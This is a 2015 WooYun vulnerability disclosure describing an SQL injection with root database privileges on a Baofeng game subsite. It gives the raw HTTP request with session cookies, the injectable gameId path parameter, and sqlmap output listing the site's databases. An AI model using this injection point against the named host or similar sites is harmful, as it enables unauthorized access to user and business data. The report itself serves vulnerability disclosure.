暴风游戏分站SQL注入(root权限)

发表于 2015年07月27日
WooYun漏洞库

漏洞概要

缺陷编号：WooYun-2015-0129756

漏洞标题：暴风游戏分站SQL注入(root权限)

漏洞详情

披露状态：

2015-07-27: 细节已通知厂商并且等待厂商处理中
2015-07-27: 厂商已经确认，细节仅向厂商公开
2015-08-06: 细节向核心白帽子及相关领域专家公开
2015-08-16: 细节向普通白帽子公开
2015-08-26: 细节向实习白帽子公开
2015-09-10: 细节向公众公开

简要描述：

暴风游戏分站SQL注入(root权限)

详细说明：

GET /Game/gamedetail/gameId/12 HTTP/1.1<br>
Host: wap.g.baofeng.com<br>
Proxy-Connection: keep-alive<br>
Cache-Control: max-age=0<br>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br>
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36<br>
Accept-Encoding: gzip, deflate, sdch<br>
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6<br>
Cookie: PHPSESSID=q8n3ddm3q6gfdt86alg2vrh7c5; Hm_lvt_34e5789c486dad0ff15ac5362a98ff71=1437962470; Hm_lpvt_34e5789c486dad0ff15ac5362a98ff71=1437989202

GET /Game/gamedetail/gameId/12 HTTP/1.1

Host: wap.g.baofeng.com

Proxy-Connection: keep-alive

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6

Cookie: PHPSESSID=q8n3ddm3q6gfdt86alg2vrh7c5; Hm_lvt_34e5789c486dad0ff15ac5362a98ff71=1437962470; Hm_lpvt_34e5789c486dad0ff15ac5362a98ff71=1437989202

http://wap.g.baofeng.com:80/Game/gamedetail/gameId/12*gameId参数存在rewrite注入root权限可以获取任意数据。

[17:31:50] [INFO] retrieved: xiaomingbf<br>
available databases [12]:<br>
[*] bf_7433<br>
[*] h5akcc<br>
[*] information_schema<br>
[*] mysql<br>
[*] performance_schema<br>
[*] webbfsitegame<br>
[*] websitegame<br>
[*] webxiaoming<br>
[*] xiaoming<br>
[*] xiaomingad<br>
[*] xiaomingbf<br>
[*] xiaomingTest[17:31:59] [INFO] Fetched data logged to text files under 'D:\tools\sqlmap\outpu<br>
t\wap.g.baofeng.com'[*] shutting down at: 17:31:59